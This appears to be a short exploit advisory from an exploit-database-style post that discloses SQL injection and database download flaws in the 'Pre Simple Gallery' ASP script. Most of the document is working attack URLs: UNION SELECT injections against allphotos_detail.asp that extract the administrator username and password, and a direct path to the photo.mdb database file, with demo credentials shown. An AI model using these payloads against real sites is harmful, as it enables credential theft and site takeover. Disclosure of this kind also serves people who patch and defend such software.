[~] Pre Simple Gallery ASP Script SQL/DD Multiple Remote Vulns.
[~] 
[~] script: http://preproject.com/projectDetail.asp?projectID=213
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu   msn: trt-turk@hotmail.com
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] dork: bende bilmiyorum arkadaslar olunca zaten bildiriyorum lutfen sormayIn ( ı dont know dork. pls you dont ask to me )
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~] -----------------------------------------------------------

exploit for demo:

you go this link:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,4,5,6,7,8,9+from+admin

right click to on photo and you must see

http://preproject.com/pgallery/pimages/4

column number 4

and you goo this links

username:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_name,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

password:

http://preproject.com/pgallery/gallery/allphotos_detail.asp?cat_id=9999999+union+select+1,2,3,user_password,5,6,7,8,9+from+admin

http://preproject.com/pgallery/pimages/admin

so for demo:

username: admin

password: admin


exp for demo: (DD)

http://preproject.com/pgallery/database/photo.mdb 

[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke 
[~]
[~] yildirimordulari.org  &  darkc0de.com
[~]
[~]----------------------------------------------------------------------